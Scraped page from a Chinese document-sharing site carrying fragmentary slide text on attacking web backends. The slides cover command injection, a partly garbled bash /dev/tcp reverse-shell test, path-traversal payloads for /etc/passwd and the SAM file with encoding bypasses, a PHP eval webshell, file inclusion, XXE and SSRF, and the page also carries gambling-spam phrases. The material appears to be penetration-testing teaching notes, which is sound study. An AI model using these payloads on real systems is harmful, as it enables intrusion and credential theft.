- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
攻击后端组件
攻击后端组件;操作系统:Linux/Windows;Web服务器内置的API与OS直接进行交互 PHP:exec() ASP:wscript.shell() JSP:Runtime.getRuntime().exec() Python: os.system()、popen() 用户可控制输入参数 程序员过滤不严格;字符;字符;基本时间延迟推断 【|| ping -c 30 || ping -n 30 】 输出回显测试 【ls;dir】 反弹shell测试 【bash?-i??/dev/tcp//8080?01】 提权 横向破坏 ;nslookup wget -o sendmail(CVE-2016-10033中,PHPMailer的RCE) -X logfile是记录log文件的,就是可以写文件; -C file是临时加载一个配置文件,就是可以读文件; -O option=value 是临时设置一个邮件存储的临时目录的配置。 ;路径遍历漏洞 /1/2/../../../../../../../etc/passwd /1/2/../../../../../../../windows/win.ini 确定攻击目标 路径 参数:file=../../../../../etc/passwd 文件上传/下载、说明文档、上传图像 基本测试 f=a/b.txt VS f=a/c/../b.txt 根目录测试 ../../../../../../../../../../../../../../../../../../ 有写权限时 基础测试 c:/1.txt c:/windows/system32/config/sam 根目录访问测试 ;绕过净化函数 ../..\ …./\ %2e、%u002e、%252e、%c0%2e 绕过前缀后缀检查函数 Filestore/../../../../../../../../../../etc/passwd ../../boot.ini%00.jpg 绕过定制编码 ../../../../etc/passwd/../../tmp/foo Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZC8uLi8uLi90bXAvZm9v ;可读文件 密码 配置文件 数据库证书 数据库源文件 Xml文件 源代码 日志文件(可能包含用户名/密码/sessionid) 可写文件 创建启动脚本 创建webshell ;Php:eval($_GET[‘passwd’]) Perl:eval() ;测试位置 Cookie名和cookie值 提交payload ;echo%2012345 :response.write%2012345 System(‘ping %20n’) Phpinfo(); ;PHP远程文件包含漏洞 http://a.php?country=US $country=$_GET[‘country’]; include($country . ‘.php’); 测试步骤 有一个远程服务器和URL 用一个不存在的URL测试是否超时 本地文件包含漏洞 测试步骤 静态资源包含测试 ;XXE攻击 !DOCTYPE foo [ ! ENTITY xxe SYSTEM “FILE:///windows/win.ini” ] searchxxe;/search SOAP注入 破坏程序逻辑;SSRF 代理服务器 内网跳板 XSS 测试步骤 查找IP或URL格式的参数 ;;Apache mod_rewrite RewriteRule ^pub/user/ ([^/\.]+)$ /inc/usr.php?mode=viewname=$1 /pub/user/tom - /inc/user.php?mode=viewname=tom /pub/user/tom%26mode=edit ;Thanks!;Shell解析脚本的过程;注入电子邮件
您可能关注的文档
- 换热器的分类详解.pptx
- 振动理论及应用21.ppt
- 掌握图的结构特征,掌握图的建立及遍历运算的实现。.doc
- 挖掘作业安全管理规范培训课件.ppt
- 掌上明珠定制衣柜-产品卖点.ppt
- 捷达5V 发动机电控1系统.ppt
- 排水管道系统设计终稿.doc
- 排烟余热利用技术分析.docx
- 排污申报计算.ppt
- 排矸系统方案说明书.doc
- 高考是生物一轮复习 核酸.pptx
- 第13课 现代战争与不同文化的碰撞和交流(课件)高二历史下册课件(选择性必修3).pptx
- 《英语》(新标准)小学修订版三年级下册Unit 1分层教学设计.docx
- 《英语》(新标准)小学修订版三年级下册Unit 6分层教学设计.docx
- 《英语》(新标准)小学修订版三年级下册Unit 2分层教学设计.docx
- 《英语》(新标准)小学修订版三年级下册Unit 3分层教学设计.docx
- 《英语》(新标准)小学修订版三年级下册Unit 5分层教学设计.docx
- 2.3.3 真菌(第二课时)七年级生物上册课件(人教版2024).pptx
- 《英语》(新标准)小学修订版三年级下册Unit 4分层教学设计.docx
- 6.3价值的创造和实现 高中政治课件.pptx
有哪些信誉好的足球投注网站
文档评论(0)